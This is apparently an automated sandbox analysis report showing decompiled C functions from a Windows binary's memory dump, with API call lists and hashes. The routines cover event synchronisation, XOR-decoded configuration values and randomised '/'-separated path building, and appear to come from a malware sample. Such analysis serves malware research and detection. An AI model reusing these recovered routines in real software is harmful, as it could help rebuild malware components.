            • Opcode ID: f8a4ed9de0b3476b6e99384d5ade1b65235b62d78e3913b92d13e7e45939b5a9
            • Instruction ID: 12e2b08a941a14483a1dc750b8c76945f60fc942df0b9ff0b049be5c5d2a67c2
            • Opcode Fuzzy Hash: f8a4ed9de0b3476b6e99384d5ade1b65235b62d78e3913b92d13e7e45939b5a9
            • Instruction Fuzzy Hash: F241B271A00219AFEB109F6ADC44BFE7779EF49314F004669E909A7381EB70BE45CB91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 87%
            			E047E49D0(signed int _a4, signed int* _a8) {
            				void* __ecx;
            				void* __edi;
            				signed int _t6;
            				intOrPtr _t8;
            				intOrPtr _t12;
            				short* _t19;
            				void* _t25;
            				signed int* _t28;
            				CHAR* _t30;
            				long _t31;
            				intOrPtr* _t32;
            
            				_t6 =  *0x47ea310; // 0xd448b889
            				_t32 = _a4;
            				_a4 = _t6 ^ 0x109a6410;
            				_t8 =  *0x47ea348; // 0xc3d5a8
            				_t3 = _t8 + 0x47eb7b4; // 0x61636f4c
            				_t25 = 0;
            				_t30 = E047E74EC(_t3, 1);
            				if(_t30 != 0) {
            					_t25 = CreateEventA(0x47ea34c, 1, 0, _t30);
            					E047E61DA(_t30);
            				}
            				_t12 =  *0x47ea2fc; // 0x2000000a
            				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E047E30D5() != 0) {
            					L12:
            					_t28 = _a8;
            					if(_t28 != 0) {
            						 *_t28 =  *_t28 | 0x00000001;
            					}
            					_t31 = E047E37DF(_t32, 0);
            					if(_t31 == 0 && _t25 != 0) {
            						_t31 = WaitForSingleObject(_t25, 0x4e20);
            					}
            					if(_t28 != 0 && _t31 != 0) {
            						 *_t28 =  *_t28 & 0xfffffffe;
            					}
            					goto L20;
            				} else {
            					_t19 =  *0x47ea124( *_t32, 0x20);
            					if(_t19 != 0) {
            						 *_t19 = 0;
            						_t19 = _t19 + 2;
            					}
            					_t31 = E047E23C4(0,  *_t32, _t19, 0);
            					if(_t31 == 0) {
            						if(_t25 == 0) {
            							L22:
            							return _t31;
            						}
            						_t31 = WaitForSingleObject(_t25, 0x4e20);
            						if(_t31 == 0) {
            							L20:
            							if(_t25 != 0) {
            								CloseHandle(_t25);
            							}
            							goto L22;
            						}
            					}
            					goto L12;
            				}
            			}














            0x047e49d1
            0x047e49d8
            0x047e49e2
            0x047e49e6
            0x047e49ec
            0x047e49fb
            0x047e4a02
            0x047e4a06
            0x047e4a18
            0x047e4a1a
            0x047e4a1a
            0x047e4a1f
            0x047e4a26
            0x047e4a7d
            0x047e4a7d
            0x047e4a83
            0x047e4a85
            0x047e4a85
            0x047e4a8f
            0x047e4a93
            0x047e4aa5
            0x047e4aa5
            0x047e4aa9
            0x047e4aaf
            0x047e4aaf
            0x00000000
            0x047e4a3f
            0x047e4a44
            0x047e4a4c
            0x047e4a50
            0x047e4a54
            0x047e4a54
            0x047e4a61
            0x047e4a65
            0x047e4a69
            0x047e4abe
            0x047e4ac4
            0x047e4ac4
            0x047e4a77
            0x047e4a7b
            0x047e4ab2
            0x047e4ab4
            0x047e4ab7
            0x047e4ab7
            0x00000000
            0x047e4ab4
            0x047e4a7b
            0x00000000
            0x047e4a65

            APIs
              • Part of subcall function 047E74EC: lstrlen.KERNEL32(00000005,00000000,43175AC3,00000027,00000000,05429E00,00000000,?,?,43175AC3,00000005,047EA00C,4D283A53,?,?), ref: 047E7522
              • Part of subcall function 047E74EC: lstrcpy.KERNEL32(00000000,00000000), ref: 047E7546
              • Part of subcall function 047E74EC: lstrcat.KERNEL32(00000000,00000000), ref: 047E754E
            • CreateEventA.KERNEL32(047EA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,047E6A95,?,?,?), ref: 047E4A11
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            • WaitForSingleObject.KERNEL32(00000000,00004E20,047E6A95,00000000,00000000,?,00000000,?,047E6A95,?,?,?), ref: 047E4A71
            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,047E6A95,?,?,?), ref: 047E4A9F
            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,047E6A95,?,?,?), ref: 047E4AB7
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
            • String ID:
            • API String ID: 73268831-0
            • Opcode ID: d0aed7533a46b5aee1deac40b60dacb684ceb08d78a967a74756d806f10faf95
            • Instruction ID: 0d388824017456f43a5418725399e7e8b723e0f6fa6df65b8741ef7b4f5cb140
            • Opcode Fuzzy Hash: d0aed7533a46b5aee1deac40b60dacb684ceb08d78a967a74756d806f10faf95
            • Instruction Fuzzy Hash: E621E4736003119BD7319A6B9C48ABB77E9EB8CB24B054725FE41EB341DB24FC009758
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 39%
            			E047E69E6(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
            				intOrPtr _v12;
            				void* _v16;
            				void* _v28;
            				char _v32;
            				void* __esi;
            				void* _t29;
            				void* _t38;
            				signed int* _t39;
            				void* _t40;
            
            				_t36 = __ecx;
            				_v32 = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				_v12 = _a4;
            				_t38 = E047E2A3D(__ecx,  &_v32);
            				if(_t38 != 0) {
            					L12:
            					_t39 = _a8;
            					L13:
            					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
            						_t23 =  &(_t39[1]);
            						if(_t39[1] != 0) {
            							E047E28B3(_t23);
            						}
            					}
            					return _t38;
            				}
            				if(E047E6ADC(0x40,  &_v16) != 0) {
            					_v16 = 0;
            				}
            				_t40 = CreateEventA(0x47ea34c, 1, 0,  *0x47ea3e4);
            				if(_t40 != 0) {
            					SetEvent(_t40);
            					Sleep(0xbb8);
            					CloseHandle(_t40);
            				}
            				_push( &_v32);
            				if(_a12 == 0) {
            					_t29 = E047E5704(_t36);
            				} else {
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_push(0);
            					_t29 = E047E4C94(_t36);
            				}
            				_t41 = _v16;
            				_t38 = _t29;
            				if(_v16 != 0) {
            					E047E7220(_t41);
            				}
            				if(_t38 != 0) {
            					goto L12;
            				} else {
            					_t39 = _a8;
            					_t38 = E047E49D0( &_v32, _t39);
            					goto L13;
            				}
            			}












            0x047e69e6
            0x047e69f3
            0x047e69f9
            0x047e69fa
            0x047e69fb
            0x047e69fc
            0x047e69fd
            0x047e6a01
            0x047e6a0d
            0x047e6a11
            0x047e6a99
            0x047e6a99
            0x047e6a9c
            0x047e6a9e
            0x047e6aa6
            0x047e6aac
            0x047e6aaf
            0x047e6aaf
            0x047e6aac
            0x047e6aba
            0x047e6aba
            0x047e6a24
            0x047e6a26
            0x047e6a26
            0x047e6a3d
            0x047e6a41
            0x047e6a44
            0x047e6a4f
            0x047e6a56
            0x047e6a56
            0x047e6a5f
            0x047e6a63
            0x047e6a71
            0x047e6a65
            0x047e6a65
            0x047e6a66
            0x047e6a67
            0x047e6a68
            0x047e6a69
            0x047e6a6a
            0x047e6a6a
            0x047e6a76
            0x047e6a79
            0x047e6a7d
            0x047e6a7f
            0x047e6a7f
            0x047e6a86
            0x00000000
            0x047e6a88
            0x047e6a88
            0x047e6a95
            0x00000000
            0x047e6a95

            APIs
            • CreateEventA.KERNEL32(047EA34C,00000001,00000000,00000040,?,?,746AF710,00000000,746AF730), ref: 047E6A37
            • SetEvent.KERNEL32(00000000), ref: 047E6A44
            • Sleep.KERNEL32(00000BB8), ref: 047E6A4F
            • CloseHandle.KERNEL32(00000000), ref: 047E6A56
              • Part of subcall function 047E5704: WaitForSingleObject.KERNEL32(00000000,?,?,?,047E6A76,?,047E6A76,?,?,?,?,?,047E6A76,?), ref: 047E57DE
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Event$CloseCreateHandleObjectSingleSleepWait
            • String ID:
            • API String ID: 2559942907-0
            • Opcode ID: 8e4796501219064b5a71a08952a6c7e74c8f04799d5e73bcc653dbc2cfa3db5c
            • Instruction ID: cded6844e217626dbb04b76b8c6390e931ba7249fcbcb83a9d85c41939802ce6
            • Opcode Fuzzy Hash: 8e4796501219064b5a71a08952a6c7e74c8f04799d5e73bcc653dbc2cfa3db5c
            • Instruction Fuzzy Hash: B82144B3D00119ABDB30AFE798888FE77ADDB1C214B458629EA11A7300D635B9559790
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 78%
            			E047E4461(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
            				intOrPtr _v8;
            				void* _v12;
            				void* _v16;
            				intOrPtr _t26;
            				intOrPtr* _t28;
            				intOrPtr _t31;
            				intOrPtr* _t32;
            				void* _t39;
            				int _t46;
            				intOrPtr* _t47;
            				int _t48;
            
            				_t47 = __eax;
            				_push( &_v12);
            				_push(__eax);
            				_t39 = 0;
            				_t46 = 0;
            				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
            				_v8 = _t26;
            				if(_t26 < 0) {
            					L13:
            					return _v8;
            				}
            				if(_v12 == 0) {
            					Sleep(0xc8);
            					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
            				}
            				if(_v8 >= _t39) {
            					_t28 = _v12;
            					if(_t28 != 0) {
            						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
            						_v8 = _t31;
            						if(_t31 >= 0) {
            							_t46 = lstrlenW(_v16);
            							if(_t46 != 0) {
            								_t46 = _t46 + 1;
            								_t48 = _t46 + _t46;
            								_t39 = E047E33DC(_t48);
            								if(_t39 == 0) {
            									_v8 = 0x8007000e;
            								} else {
            									memcpy(_t39, _v16, _t48);
            								}
            								__imp__#6(_v16);
            							}
            						}
            						_t32 = _v12;
            						 *((intOrPtr*)( *_t32 + 8))(_t32);
            					}
            					 *_a4 = _t39;
            					 *_a8 = _t46 + _t46;
            				}
            				goto L13;
            			}














            0x047e446d
            0x047e4471
            0x047e4472
            0x047e4473
            0x047e4475
            0x047e4477
            0x047e447a
            0x047e447f
            0x047e4516
            0x047e451d
            0x047e451d
            0x047e4488
            0x047e448f
            0x047e449f
            0x047e449f
            0x047e44a5
            0x047e44a7
            0x047e44ac
            0x047e44b5
            0x047e44bb
            0x047e44c0
            0x047e44cb
            0x047e44cf
            0x047e44d1
            0x047e44d2
            0x047e44db
            0x047e44df
            0x047e44f0
            0x047e44e1
            0x047e44e6
            0x047e44eb
            0x047e44fa
            0x047e44fa
            0x047e44cf
            0x047e4500
            0x047e4506
            0x047e4506
            0x047e450f
            0x047e4514
            0x047e4514
            0x00000000

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: FreeSleepStringlstrlenmemcpy
            • String ID:
            • API String ID: 1198164300-0
            • Opcode ID: c215924a569eb458ab662e52e73b85786ee4f9cb56dd64a8613184af6d8f6c5b
            • Instruction ID: a4d539844c1de1c05179a6207c28f02a1abf909e394fca3182a095cd3b344035
            • Opcode Fuzzy Hash: c215924a569eb458ab662e52e73b85786ee4f9cb56dd64a8613184af6d8f6c5b
            • Instruction Fuzzy Hash: 712132B5A00209EFDB11DFA5D9889EEBBB5FF4D314B108269E905E7300EB34EA01CB50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E047E2708(unsigned int __eax, void* __ecx) {
            				void* _v8;
            				void* _v12;
            				signed int _t21;
            				signed short _t23;
            				char* _t27;
            				void* _t29;
            				void* _t30;
            				unsigned int _t33;
            				void* _t37;
            				unsigned int _t38;
            				void* _t41;
            				void* _t42;
            				int _t45;
            				void* _t46;
            
            				_t42 = __eax;
            				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
            				_t38 = __eax;
            				_t30 = RtlAllocateHeap( *0x47ea2d8, 0, (__eax >> 3) + __eax + 1);
            				_v12 = _t30;
            				if(_t30 != 0) {
            					_v8 = _t42;
            					do {
            						_t33 = 0x18;
            						if(_t38 <= _t33) {
            							_t33 = _t38;
            						}
            						_t21 =  *0x47ea2f0; // 0x8fa6e5a0
            						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
            						 *0x47ea2f0 = _t23;
            						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
            						memcpy(_t30, _v8, _t45);
            						_v8 = _v8 + _t45;
            						_t27 = _t30 + _t45;
            						_t38 = _t38 - _t45;
            						_t46 = _t46 + 0xc;
            						 *_t27 = 0x2f;
            						_t13 = _t27 + 1; // 0x1
            						_t30 = _t13;
            					} while (_t38 > 8);
            					memcpy(_t30, _v8, _t38 + 1);
            				}
            				return _v12;
            			}

















            0x047e2710
            0x047e2713
            0x047e2719
            0x047e2731
            0x047e2733
            0x047e2738
            0x047e273a
            0x047e273d
            0x047e273f
            0x047e2742
            0x047e2744
            0x047e2744
            0x047e2746
            0x047e2751
            0x047e2756
            0x047e2767
            0x047e276f
            0x047e2774
            0x047e2777
            0x047e277a
            0x047e277c
            0x047e277f
            0x047e2782
            0x047e2782
            0x047e2785
            0x047e2790
            0x047e2795
            0x047e279f

            APIs
            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,047E6708,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E2713
            • RtlAllocateHeap.NTDLL(00000000,?), ref: 047E272B
            • memcpy.NTDLL(00000000,05429600,-00000008,?,?,?,047E6708,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E276F
            • memcpy.NTDLL(00000001,05429600,00000001,047E3ECE,00000000,05429600), ref: 047E2790
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: memcpy$AllocateHeaplstrlen
            • String ID:
            • API String ID: 1819133394-0
            • Opcode ID: 09ab169541ea4cf7d5bac85b254b2be8f0b65ebba83ecf9278128b61e2b05953
            • Instruction ID: e3af93278f37b725d2725226e1018e1f79fde2742fd79e1f0dbe247881680b52
            • Opcode Fuzzy Hash: 09ab169541ea4cf7d5bac85b254b2be8f0b65ebba83ecf9278128b61e2b05953
            • Instruction Fuzzy Hash: 3F110A72A00215AFD7108A6ADD84DAE7BBEEBC8360B154375F504DB241E7759E008790
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E047E23C4(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
            				intOrPtr _v36;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				void _v60;
            				char _v64;
            				intOrPtr _t18;
            				intOrPtr _t19;
            				intOrPtr _t26;
            				intOrPtr _t27;
            				long _t28;
            
            				_t27 = __edi;
            				_t26 = _a8;
            				_t28 = E047E3A63(_a4, _t26, __edi);
            				if(_t28 != 0) {
            					memset( &_v60, 0, 0x38);
            					_t18 =  *0x47ea348; // 0xc3d5a8
            					_t28 = 0;
            					_v64 = 0x3c;
            					if(_a12 == 0) {
            						_t7 = _t18 + 0x47eb50c; // 0x70006f
            						_t19 = _t7;
            					} else {
            						_t6 = _t18 + 0x47eb8d8; // 0x750072
            						_t19 = _t6;
            					}
            					_v52 = _t19;
            					_push(_t28);
            					_v48 = _a4;
            					_v44 = _t26;
            					_v36 = _t27;
            					E047E5B56();
            					_push( &_v64);
            					if( *0x47ea100() == 0) {
            						_t28 = GetLastError();
            					}
            					_push(1);
            					E047E5B56();
            				}
            				return _t28;
            			}














            0x047e23c4
            0x047e23cb
            0x047e23d9
            0x047e23dd
            0x047e23e7
            0x047e23ec
            0x047e23f1
            0x047e23f6
            0x047e2400
            0x047e240a
            0x047e240a
            0x047e2402
            0x047e2402
            0x047e2402
            0x047e2402
            0x047e2410
            0x047e2416
            0x047e2417
            0x047e241a
            0x047e241d
            0x047e2420
            0x047e2428
            0x047e2431
            0x047e2439
            0x047e2439
            0x047e243b
            0x047e243d
            0x047e243d
            0x047e2447

            APIs
              • Part of subcall function 047E3A63: SysAllocString.OLEAUT32(00000000), ref: 047E3ABD
              • Part of subcall function 047E3A63: SysAllocString.OLEAUT32(0070006F), ref: 047E3AD1
              • Part of subcall function 047E3A63: SysAllocString.OLEAUT32(00000000), ref: 047E3AE3
            • memset.NTDLL ref: 047E23E7
            • GetLastError.KERNEL32 ref: 047E2433
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: AllocString$ErrorLastmemset
            • String ID: <$@MetNet
            • API String ID: 3736384471-3263418992
            • Opcode ID: 8f82f7763146933a81b725447da5b3c9d34c660da03e376f6ef2d100f7a7215e
            • Instruction ID: a92264b165f986bca8ad9ec785094cc3059eeb517eed1a7e45ef59aa701c759e
            • Opcode Fuzzy Hash: 8f82f7763146933a81b725447da5b3c9d34c660da03e376f6ef2d100f7a7215e
            • Instruction Fuzzy Hash: DF014471900218ABD711DFA6D884EDD7BBCEB0C744F408266F904E7341E774AD408BD1
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E7843(void* __esi) {
            				struct _SECURITY_ATTRIBUTES* _v4;
            				void* _t8;
            				void* _t10;
            
            				_v4 = 0;
            				memset(__esi, 0, 0x38);
            				_t8 = CreateEventA(0, 1, 0, 0);
            				 *(__esi + 0x1c) = _t8;
            				if(_t8 != 0) {
            					_t10 = CreateEventA(0, 1, 1, 0);
            					 *(__esi + 0x20) = _t10;
            					if(_t10 == 0) {
            						CloseHandle( *(__esi + 0x1c));
            					} else {
            						_v4 = 1;
            					}
            				}
            				return _v4;
            			}






            0x047e784d
            0x047e7851
            0x047e7866
            0x047e7868
            0x047e786d
            0x047e7873
            0x047e7875
            0x047e787a
            0x047e7885
            0x047e787c
            0x047e787c
            0x047e787c
            0x047e787a
            0x047e7893

            APIs
            • memset.NTDLL ref: 047E7851
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,746981D0,00000000,00000000), ref: 047E7866
            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 047E7873
            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,047E3F34,00000000,?), ref: 047E7885
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: CreateEvent$CloseHandlememset
            • String ID:
            • API String ID: 2812548120-0
            • Opcode ID: beb325a873c7877eee2f607794f0102a84fed5e02b991ce6fd95e1eae83fad7e
            • Instruction ID: 0e2798fad843167157c9c7e2ad7ef5cfb2de6faa7fb5da19d5bdd2fce1499468
            • Opcode Fuzzy Hash: beb325a873c7877eee2f607794f0102a84fed5e02b991ce6fd95e1eae83fad7e
            • Instruction Fuzzy Hash: 2BF054F11043087FE3145F27DCC4C77BB9CEB991987114E3EF14295611D675AC058A60
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E047E3230() {
            				void* _t1;
            				intOrPtr _t5;
            				void* _t6;
            				void* _t7;
            				void* _t11;
            
            				_t1 =  *0x47ea30c; // 0x1ac
            				if(_t1 == 0) {
            					L8:
            					return 0;
            				}
            				SetEvent(_t1);
            				_t11 = 0x7fffffff;
            				while(1) {
            					SleepEx(0x64, 1);
            					_t5 =  *0x47ea35c; // 0x0
            					if(_t5 == 0) {
            						break;
            					}
            					_t11 = _t11 - 0x64;
            					if(_t11 > 0) {
            						continue;
            					}
            					break;
            				}
            				_t6 =  *0x47ea30c; // 0x1ac
            				if(_t6 != 0) {
            					CloseHandle(_t6);
            				}
            				_t7 =  *0x47ea2d8; // 0x5030000
            				if(_t7 != 0) {
            					HeapDestroy(_t7);
            				}
            				goto L8;
            			}








            0x047e3230
            0x047e3237
            0x047e3281
            0x047e3283
            0x047e3283
            0x047e323b
            0x047e3241
            0x047e3246
            0x047e324a
            0x047e3250
            0x047e3257
            0x00000000
            0x00000000
            0x047e3259
            0x047e325e
            0x00000000
            0x00000000
            0x00000000
            0x047e325e
            0x047e3260
            0x047e3268
            0x047e326b
            0x047e326b
            0x047e3271
            0x047e3278
            0x047e327b
            0x047e327b
            0x00000000

            APIs
            • SetEvent.KERNEL32(000001AC,00000001,047E109A), ref: 047E323B
            • SleepEx.KERNEL32(00000064,00000001), ref: 047E324A
            • CloseHandle.KERNEL32(000001AC), ref: 047E326B
            • HeapDestroy.KERNEL32(05030000), ref: 047E327B
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: CloseDestroyEventHandleHeapSleep
            • String ID:
            • API String ID: 4109453060-0
            • Opcode ID: 8b7700602304bc1bac64543859b4853c27c0492f108fbb69d657ccb99e91bcaf
            • Instruction ID: 0ad87824b87b85c6dfaf736fa337f5049638fd4c5c24fe75a60f00d9cdd5beb9
            • Opcode Fuzzy Hash: 8b7700602304bc1bac64543859b4853c27c0492f108fbb69d657ccb99e91bcaf
            • Instruction Fuzzy Hash: 75F0ACB6B0121297DB109A77DA88AE63BECEB0C761B458754BD41EF3C2DB28EC409560
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E047E2058(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
            				intOrPtr* _v8;
            				void* _t17;
            				intOrPtr* _t22;
            				void* _t27;
            				char* _t30;
            				void* _t33;
            				void* _t34;
            				void* _t36;
            				void* _t37;
            				void* _t39;
            				int _t42;
            
            				_t17 = __eax;
            				_t37 = 0;
            				__imp__(_a4, _t33, _t36, _t27, __ecx);
            				_t2 = _t17 + 1; // 0x1
            				_t28 = _t2;
            				_t34 = E047E33DC(_t2);
            				if(_t34 != 0) {
            					_t30 = E047E33DC(_t28);
            					if(_t30 == 0) {
            						E047E61DA(_t34);
            					} else {
            						_t39 = _a4;
            						_t22 = E047E7AE9(_t39);
            						_v8 = _t22;
            						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
            							_a4 = _t39;
            						} else {
            							_t26 = _t22 + 2;
            							_a4 = _t22 + 2;
            							_t22 = E047E7AE9(_t26);
            							_v8 = _t22;
            						}
            						if(_t22 == 0) {
            							__imp__(_t34, _a4);
            							 *_t30 = 0x2f;
            							 *((char*)(_t30 + 1)) = 0;
            						} else {
            							_t42 = _t22 - _a4;
            							memcpy(_t34, _a4, _t42);
            							 *((char*)(_t34 + _t42)) = 0;
            							__imp__(_t30, _v8);
            						}
            						 *_a8 = _t34;
            						_t37 = 1;
            						 *_a12 = _t30;
            					}
            				}
            				return _t37;
            			}














            0x047e2058
            0x047e2062
            0x047e2064
            0x047e206a
            0x047e206a
            0x047e2073
            0x047e2077
            0x047e2083
            0x047e2087
            0x047e20fb
            0x047e2089
            0x047e2089
            0x047e208d
            0x047e2092
            0x047e2097
            0x047e20b1
            0x047e20a0
            0x047e20a0
            0x047e20a4
            0x047e20a7
            0x047e20ac
            0x047e20ac
            0x047e20b6
            0x047e20de
            0x047e20e4
            0x047e20e7
            0x047e20b8
            0x047e20ba
            0x047e20c2
            0x047e20cd
            0x047e20d2
            0x047e20d2
            0x047e20ee
            0x047e20f5
            0x047e20f6
            0x047e20f6
            0x047e2087
            0x047e2106

            APIs
            • lstrlen.KERNEL32(00000000,00000008,?,74654D40,?,?,047E51F7,?,?,?,?,00000102,047E21E7,?,?,746981D0), ref: 047E2064
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
              • Part of subcall function 047E7AE9: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,047E2092,00000000,00000001,00000001,?,?,047E51F7,?,?,?,?,00000102), ref: 047E7AF7
              • Part of subcall function 047E7AE9: StrChrA.SHLWAPI(?,0000003F,?,?,047E51F7,?,?,?,?,00000102,047E21E7,?,?,746981D0,00000000), ref: 047E7B01
            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047E51F7,?,?,?,?,00000102,047E21E7,?), ref: 047E20C2
            • lstrcpy.KERNEL32(00000000,00000000), ref: 047E20D2
            • lstrcpy.KERNEL32(00000000,00000000), ref: 047E20DE
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
            • String ID:
            • API String ID: 3767559652-0
            • Opcode ID: 4a9c5cd2886e4f81424b2d45f6ad5bd0e815fcca367d7343d4f0a91d2bd9d50a
            • Instruction ID: 3cead67941259d549ef59be3285428dfad3c5ab885e2e5d88805f39b8065b3c4
            • Opcode Fuzzy Hash: 4a9c5cd2886e4f81424b2d45f6ad5bd0e815fcca367d7343d4f0a91d2bd9d50a
            • Instruction Fuzzy Hash: 5721F372100216EBCB129FA6C848ABA7FBCEF09254B148694F9059B302D635EA40C7A1
            Uniqueness

